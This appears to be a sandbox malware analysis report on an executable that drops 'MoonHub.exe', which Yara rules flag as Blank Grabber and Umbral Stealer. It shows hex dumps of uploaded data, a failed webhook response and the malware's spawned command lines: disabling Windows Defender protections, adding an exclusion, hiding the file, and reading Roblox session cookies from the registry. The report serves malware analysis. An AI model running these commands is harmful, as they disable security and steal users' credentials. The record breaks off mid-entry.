                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: cc 7a e5 ff 4c 42 72 57 6c ce 88 f9 97 7f 68 a9 8e cb cd 1a 3b 74 49 ac 5b 70 b8 8d 17 16 2b fb 8c a7 2d 66 c3 26 e8 8d 5e 07 a7 44 33 f2 81 e0 5f 07 03 9b 79 d1 ea 09 10 a9 81 09 f6 d0 a3 a7 14 1a 97 ea 48 89 22 e4 b7 13 d4 87 55 93 ee 25 37 85 72 59 e2 bb 51 33 5c cb 75 d9 e4 d0 ad 16 16 1f ff 88 f1 7a 91 0d f7 b5 8b 6f b3 4c 60 ee e6 42 03 72 10 4b 35 9c ca 78 2e 97 fe c4 19 4a fc 53 06 07 9a ff ba df dc 11 0b 95 a5 fd 9f 78 aa 8c fd eb 9d ff 91 2c 4f 8c 3b 66 3a ff fd 01 2f a8 45 08 37 a2 c7 d4 20 69 f7 3b 5e ef 25 8a f3 40 60 e7 e6 48 64 f3 97 21 8c 6f 18 63 86 77 80 31 7c 73 67 d4 cb 9f 84 4b 0a b1 3a e7 e5 07 25 b4 9d 4e c0 c4 07 0c dd 0f 51 05 a5 d5 4d e5 85 1c 4f 05 56 ab b4 ce 02 c7 94 0b ec 9b 0d f2 ea ea 9d 96 aa 67 36 af 64 ad ab b7 f9 e6 bf
                                                                                                                                                                              Data Ascii: zLBrWlh;tI[p+-f&^D3_yH"U%7rYQ3\uzoL`BrK5x.JSx,O;f:/E7 i;^%@`Hd!ocw1|sgK:%NQMOVg6d
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: e3 e0 b4 9a 89 f4 6d a4 63 8c 3e e3 62 3f 43 23 94 25 51 17 9e 07 34 63 94 ed a7 d4 85 3f 57 b4 09 3d 5a 0b 08 90 25 ba 9a 8a aa 98 68 5b 15 f9 ad fd 91 52 99 31 24 e4 67 90 bc cb aa 35 56 e0 b4 bd 97 12 5f 89 75 1f a4 df 0a b5 2c 5a e0 fa ba 68 c3 68 3c 91 a9 10 89 60 51 a5 19 e6 08 09 1a 2b 81 c4 ad 18 68 ac 67 6b ae cb 0a e5 9a c6 e6 b5 7b c0 21 7d f1 61 03 62 94 26 57 b8 94 e8 11 5a 7c 8c 04 39 63 e7 59 63 0a 3c 17 92 57 bb 71 af f0 3c ed 46 49 5b 71 cd 20 e3 1d fb d9 0f 4c be 31 57 e3 27 7c 69 db e3 1a be 00 df 51 23 7d c8 40 69 7b 62 d0 74 87 82 db 5d aa 97 fd 9a 5b 1b de e4 40 8d 76 8f 3b dc eb d5 20 e6 06 8e 65 90 25 01 71 b2 9d 82 92 42 b6 66 ae 5d 12 22 84 a3 51 82 25 1c 86 85 ef 4b 2b 15 cd 0b 86 de 94 36 c0 ad 38 0d cd 5c cb 7d 57 5c b3 36 7d
                                                                                                                                                                              Data Ascii: mc>b?C#%Q4c?W=Z%h[R1$g5V_u,Zhh<`Q+hgk{!}ab&WZ|9cYc<Wq<FI[q L1W'|iQ#}@i{bt][@v; e%qBf]"Q%K+68\}W\6}
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: 7d bf ff d2 54 e4 36 d6 4e b0 66 f5 b6 6e f2 ce 5d 0d 47 7c f9 fa ef 21 87 68 07 4d f3 7c 48 61 67 7e af 9e 0a 2c d4 4e ba 3c a3 9b e2 32 cf 5f cd 47 df fb fe 76 9c 6f 21 dd 01 1e 98 1e 55 18 e2 ca 92 5f 85 f0 8c f6 93 80 dc 83 d6 c0 d0 88 a2 9d bb 35 0d 03 73 cd d8 92 82 8d 64 a3 1e 03 d8 c1 ac d3 a0 58 cc d2 95 1b 36 1d 6f 6a 00 92 d6 43 02 55 d7 2e c9 d7 3a 2b e2 de d7 bc d6 d1 ec 39 09 fa 25 b4 b3 2e 58 8b bf f7 53 8f 9f 36 ba 3f 9f 98 cf ce a4 2a be 35 e5 29 c7 ef 4d 31 ae b3 11 af 6e f8 a7 02 4a 2a d7 88 17 82 9b 20 3e cb ce a4 70 0d 9a f6 bc 8b c6 38 ca 6c 51 f9 3d b0 4f e8 d2 c2 3f 6a 32 61 41 eb f3 78 a4 8d 22 20 11 c0 01 ec f7 23 76 c8 49 26 35 fa eb 61 5e 2e 21 be 94 a4 8f e4 dc 6f 98 cb a1 46 c5 03 fa 3a ec 2a 76 38 7d 04 39 9a 4d c6 b5 62 1d
                                                                                                                                                                              Data Ascii: }T6Nfn]G|!hM|Hag~,N<2_Gvo!U_5sdX6ojCU.:+9%.XS6?*5)M1nJ* >p8lQ=O?j2aAx" #vI&5a^.!oF:*v8}9Mb
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: c4 f5 64 aa e1 bb e3 e5 74 5f ce 23 1f 37 74 76 c5 17 47 62 17 bc ad ad 70 97 c9 73 7e a2 6c e9 b7 6d 6b e6 60 df 50 34 bc 90 c2 49 c8 42 3f 7c ce 55 d1 ab e4 6a 93 ca 22 b3 07 6d db 7e 00 2d 3c f9 b8 b5 ba 90 83 6e cf 32 f1 f2 5f e1 30 9e 08 6e 36 1c 40 06 25 85 47 6b 0c c5 18 10 4b 16 c5 d9 7e d3 3d 2a e8 c8 bb 06 fd da ee 69 2d d0 1b 2e d0 12 1f 20 3c 6f c1 5f 71 27 8e d3 7b be 65 2f f2 8e c6 9a e0 26 14 1d ad 21 09 e2 7a 8d 9c 92 2b de a9 9c ff c2 bc 4e fe 51 c2 eb 64 e7 a4 c4 68 33 84 fe 79 d0 de 5b 8f a6 30 fb d5 9c 1e 63 71 17 e7 df 97 a2 e9 35 bd 90 86 27 f6 cf eb 68 fd 76 7f 32 33 23 83 e3 7d 50 e4 01 82 c5 5e 81 40 4c 42 5c 1d 3d da 9e 96 ef c1 a5 95 ab ce 3c b9 86 c1 c3 7a ea a4 8f 38 ad 94 e4 40 87 ca f9 4f 6e 29 50 91 77 da ff dc a8 db e0 5a
                                                                                                                                                                              Data Ascii: dt_#7tvGbps~lmk`P4IB?|Uj"m~-<n2_0n6@%GkK~=*i-. <o_q'{e/&!z+NQdh3y[0cq5'hv23#}P^@LB\=<z8@On)PwZ
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: 25 da de b4 70 c2 d6 fc 4e 64 40 0c 97 8d e6 78 d0 ed ce 82 f8 6e d4 5e 6f 7b c5 a6 69 8b dc d2 02 db 48 e3 2b c8 ad 8e 1f ba 3f 6a cc 63 75 f3 6c 8e d2 28 ac 3c 29 bf cd e8 d9 46 b2 cb 37 e1 44 3c 1c 8a 40 00 ea 64 97 b9 6c db 89 02 7c 55 9e f5 8c fc 5e 2e 40 54 e9 64 3f fe f0 dd e1 be fa ba e4 b8 16 b3 43 13 37 f4 e8 bf 9b 82 b4 43 69 4f 1e 1c cb 4d 8c 47 1b 92 8d a3 6e 3d f9 4b bd cd 05 c9 69 0e 01 97 1b c5 c5 7c e9 99 d3 bb 2b 52 40 31 ec 7b fb 6a 68 09 92 83 41 1f 12 37 b2 7b 26 a2 7a fd b5 97 10 22 d7 bc 98 fa f6 64 a2 98 b2 b3 91 24 f5 09 ac d1 eb 59 d0 5f 88 e3 b1 4d 17 a4 25 22 4b 67 14 0f de 08 4a 97 a5 05 d9 ec 0d 96 59 63 7f be c7 ce 49 c2 8a 16 96 02 ef a8 81 62 83 2d 27 8c e0 38 3e 37 ee ba da b3 a6 5a 7b 33 6d 98 bc 2d c2 6e 75 72 19 85 f0
                                                                                                                                                                              Data Ascii: %pNd@xn^o{iH+?jcul(<)F7D<@dl|U^.@Td?C7CiOMGn=Ki|+R@1{jhA7{&z"d$Y_M%"KgJYcIb-'8>7Z{3m-nur
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: 56 d1 e0 4f ee 45 bf 5b 78 47 83 96 85 7e 42 a7 75 3d da 2b cc aa ea 5c 74 15 f9 ca f8 8c ae df ac 2c 55 18 f0 20 15 7b 88 6d 0c 65 b5 fc f3 34 ae d1 ec 4a 6c b3 6a 6f 12 1f 8a 7b 5e b8 56 07 f2 24 ef 60 b2 15 c4 f1 37 0f 4a e0 97 2b 98 93 10 ef 0a da 0a a4 4b b8 f9 af a7 4f ec d2 1b ec c2 fe 4a 0e 91 13 bd a7 05 f5 7e 85 01 73 50 24 74 cc 1a 13 8d 31 c4 ee 60 06 fc 65 6b c0 43 55 55 ea bb f9 3d d2 51 ae f2 76 54 4f db f0 94 fa f4 e5 f1 60 c7 7b e2 cf 6f b4 6e d5 cd e5 e6 13 dc 9b 45 4a 40 99 d5 02 43 2d 4f af de 58 0a 5d b1 4a e4 59 f6 3c b4 fa 52 b7 82 68 3a aa b8 5d ba cb 13 2d 5f e6 8f 67 d8 6c 04 5f 32 9f 44 39 f4 34 a1 70 65 bf 0c 1d 73 2e 7b 9b 29 88 59 49 84 89 2d f6 06 fe 29 11 1d 63 21 28 ed f5 e3 fa 84 b2 27 ae ba 23 ba de df 27 23 ec c3 51 88
                                                                                                                                                                              Data Ascii: VOE[xG~Bu=+\t,U {me4Jljo{^V$`7J+KOJ~sP$t1`ekCUU=QvTO`{onEJ@C-OX]JY<Rh:]-_gl_2D94pes.{)YI-)c!('#'#Q
                                                                                                                                                                              2025-01-12 06:11:30 UTC16355OUTData Raw: fd 07 0b 02 af 16 8e 2a fb 1c c6 76 e8 f6 c2 b7 0f 33 cc 65 e8 b5 fd ce 06 6f 2e b0 0b 6f e6 b2 e9 5d 65 de f3 b3 50 f3 1c 26 ab 90 2a c3 76 b7 94 27 42 02 2e 13 6d 1b 3a cc 06 97 6a 1a aa 16 46 31 da 98 93 93 df 43 30 42 45 7d 9b 0c e4 78 f0 ae fc 2d 35 c6 66 3b fc 14 7d 32 f3 c2 7d 7f dc d3 85 d2 03 16 46 0b 47 bd 75 3e 02 5b 21 6e 57 de 77 50 48 7b 9c ae c0 e9 4b 5b 93 12 91 5a e7 b2 19 68 e8 a7 f7 30 82 71 6f 4f e3 24 49 1a fe 51 05 54 c5 6b 02 70 bb 81 00 47 b7 f7 66 1e 7f 66 27 d7 29 3c 4b 31 4a 55 fd 64 f5 7e e6 ab d7 60 af 7d cf 3f 7d 12 61 42 92 e3 6b fe 7a c1 4a 96 4d ff 79 00 31 fe fd d4 c5 d6 b9 07 37 fe 17 09 3d 10 8e 3c cb 9c d5 02 2a 87 97 7b dd 00 3d a4 d4 c3 bd f9 4c 0f ba 91 5c 46 e8 fc cc ad 5c 49 cc b9 4d d6 f5 76 42 d8 b8 de 04 17 df
                                                                                                                                                                              Data Ascii: *v3eo.o]eP&*v'B.m:jF1C0BE}x-5f;}2}FGu>[!nWwPH{K[Zh0qoO$IQTkpGff')<K1JUd~`}?}aBkzJMy17=<*{=L\F\IMvB
                                                                                                                                                                              2025-01-12 06:11:31 UTC1011INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sun, 12 Jan 2025 06:11:31 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 45
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                              x-ratelimit-reset: 1736662292
                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKVv4Q0YGUof%2FDk4xwgppxhE%2BNTAm7CbOF7VlJb5z13OICd9Uoh6%2B8tuWasMP7cVdvDmMG32JN%2BZYm3HS0BCtGI%2B3a2vln4sPZ86subu3v8Vv%2BolQgP4lYHf2nNG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 900afd53ae194308-EWR
                                                                                                                                                                              {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:01:10:11
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\resembleC2.exe"
                                                                                                                                                                              Imagebase:0xc70000
                                                                                                                                                                              File size:131'072 bytes
                                                                                                                                                                              MD5 hash:4C8044C83F60465EAE3CC16D7C858085
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:01:10:18
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
                                                                                                                                                                              Imagebase:0xd70000
                                                                                                                                                                              File size:46'080 bytes
                                                                                                                                                                              MD5 hash:8C7D2F0A936DBE6D0899D40171FFB668
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 34%, ReversingLabs
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:01:10:18
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\OpenWith.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                              Imagebase:0x7ff7ead40000
                                                                                                                                                                              File size:123'984 bytes
                                                                                                                                                                              MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:01:10:19
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                                                                                                                                                                              Imagebase:0x156585b0000
                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                              MD5 hash:F70B5E56A09AF292D4E909C547F9C8C0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 76%, ReversingLabs
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:01:10:23
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:01:10:23
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                                                                                                                                                                              Imagebase:0x7ff6f5ae0000
                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:01:10:28
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                              Imagebase:0x7ff6ef0c0000
                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:01:10:33
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:01:10:33
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:01:10:36
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:01:10:36
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:01:10:47
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:20
                                                                                                                                                                              Start time:01:10:47
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:01:11:02
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic.exe" os get Caption
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:01:11:02
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:01:11:03
